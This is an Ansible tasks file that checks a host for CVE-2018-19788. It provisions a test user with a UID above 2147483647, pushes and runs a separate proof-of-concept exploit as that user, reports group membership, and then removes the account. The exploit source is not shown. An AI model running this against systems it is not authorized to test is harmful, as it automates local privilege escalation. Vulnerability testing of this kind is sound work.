---
# tasks file for CVE-2018-19788

- name: Provision a unprivileged user with UID greater than 2147483647
  block:
  - name: Add a cve test account
    user:
      name: "{{ CVE_2018_19788_test_user }}"
      comment: Test for CVE-2018-19788
      shell: /bin/bash
      uid: "{{ CVE_2018_19788_test_user_uid }}"

- name: Exploit the CVE-2018-19788
  block:
  - name: Push the PoC exploit code
    copy:
      src: ./{{ CVE_2018_19788_poc_exploit_file }}
      dest: $HOME/{{ CVE_2018_19788_poc_exploit_file }}
      owner: "{{ CVE_2018_19788_test_user }}"
      group: "{{ CVE_2018_19788_test_user }}"
      mode: 0755

  - name: Execute the exploit code
    shell: ./"{{ CVE_2018_19788_poc_exploit_file }}"
    args:
      chdir: $HOME/

  - name: Produce the output of the PoC
    command: groups
    register: exploit_poc

  rescue:
  - name: Rollback
    debug:
      msg: Something went wrong, or your system is not vulnerable

  become: True
  become_user: cve_test

- name: Output the PoC
  debug:
    msg: "{{ exploit_poc }}"
  when: exploit_poc is defined

- name: Remove the unprivileged user provisioned for testing purposes
  block:
  - name:  Remove the cve test account
    user:
      name: "{{ CVE_2018_19788_test_user }}"
      state: absent
      remove: Yes
      uid: "{{ CVE_2018_19788_test_user_uid }}"

# - name: Output a list of users
#   shell: getent passwd | awk -F: '$3 >= 2147483647 {print $1}'
#   register: users_list

# - name: Debug
#   debug:
#     msg: "{{ users_list }}"
#   when: users_list is defined